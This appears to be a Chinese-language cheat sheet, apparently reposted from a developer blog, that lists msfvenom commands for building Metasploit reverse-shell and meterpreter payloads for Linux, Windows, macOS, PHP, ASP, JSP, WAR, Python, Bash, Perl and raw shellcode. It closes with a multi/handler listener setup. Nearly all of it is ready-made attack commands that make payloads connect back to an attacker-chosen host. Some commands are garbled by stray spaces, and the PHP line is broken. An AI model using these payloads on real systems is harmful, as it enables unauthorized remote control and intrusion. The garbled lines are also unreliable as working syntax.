17370845950

收藏Metasploit payload

通常 metasploit 最有用(对于初学者来说被低估)的功能之一是 msfpayload 模块。可以使用此模块创建多个有效负载,它有助于在几乎任何情况下为您提供外壳。对于这些有效负载中的每一个,您都可以进入 msfconsole 并选择exploit/multi/handler。为使用的相关负载运行“设置负载”并配置所有必要的选项(lhost、lport 等)。执行并等待有效负载运行。对于下面的示例,它是不言自明的,但 lhost 应填写您的 ip 地址(如果在网络内进行攻击,则为 lan ip,如果通过 internet 进行攻击,则为 wan ip),并且 lport 应该是您希望重新连接的端口。

Linux

代码语言:javascript代码运行次数:0运行复制
msfvenom -p linux / x86 / meterpreter / reverse_tcp LHOST = <您的IP地址>  LPORT = <您要连接的端口>  -f elf > shell.elf

Windows

代码语言:javascript代码运行次数:0运行复制
msfvenom -p windows / meterpreter / reverse_tcp LHOST = <您的IP地址>  LPORT = <您要连接的端口>  -f exe > shell.exe

Mac

代码语言:javascript代码运行次数:0运行复制
msfvenom -p osx / x86 / shell_reverse_tcp LHOST = <您的 IP 地址>  LPORT = <您要连接的端口>  -f macho > shell.macho

PHP

代码语言:javascript代码运行次数:0运行复制
msfvenom -p php / meterpreter_reverse_tcp LHOST = <你的 IP 地址>  LPORT = <你的连接端口>  -f raw > shell.php cat shell.php | pbcopy &&  echo  ' shell.php && pbpaste >> shell.php

ASP

代码语言:javascript代码运行次数:0运行复制
msfvenom -p windows / meterpreter / reverse_tcp LHOST = <您的IP地址>  LPORT = <您要连接的端口>  -f asp > shell.asp

JSP

代码语言:javascript代码运行次数:0运行复制
msfvenom -p java / jsp_shell_reverse_tcp LHOST = <您的IP地址>  LPORT = <您要连接的端口>  -f raw > shell.jsp

War

代码语言:javascript代码运行次数:0运行复制
msfvenom -p java / jsp_shell_reverse_tcp LHOST = <您的IP地址>  LPORT = <您要连接的端口>  -f war > shell.war

Python

代码语言:javascript代码运行次数:0运行复制
msfvenom -p cmd / unix / reverse_python LHOST = <你的 IP 地址>  LPORT = <你要连接的端口>  -f raw > shell.py

Bash

代码语言:javascript代码运行次数:0运行复制
msfvenom -p cmd / unix / reverse_bash LHOST = <您的 IP 地址>  LPORT = <您要连接的端口>  -f raw > shell.sh

Perl

代码语言:javascript代码运行次数:0运行复制
msfvenom -p cmd / unix / reverse_perl LHOST = <你的 IP 地址>  LPORT = <你要连接的端口>  -f raw > shell.pl

Linux Based Shellcode

代码语言:javascript代码运行次数:0运行复制
msfvenom -p linux / x86 / meterpreter / reverse_tcp LHOST = <您的IP地址>  LPORT = <您要连接的端口>  -f  <语言>

Windows Based Shellcode

代码语言:javascript代码运行次数:0运行复制
msfvenom -p windows / meterpreter / reverse_tcp LHOST = <您的IP地址>  LPORT = <您要连接的端口>  -f  <语言>

Mac Based Shellcode

代码语言:javascript代码运行次数:0运行复制
msfvenom -p osx / x86 / shell_reverse_tcp LHOST = <您的 IP 地址>  LPORT = <您要连接的端口>  -f  <语言>

设置 Metasploit 以接收传入的 shell

代码语言:javascript代码运行次数:0运行复制
use exploit/multi/handlerset PAYLOAD set LHOST set LPORT set ExitOnSession falseexploit -j -z

完成所需的值后,以下命令将执行您的处理程序 – 'msfconsole -L -r '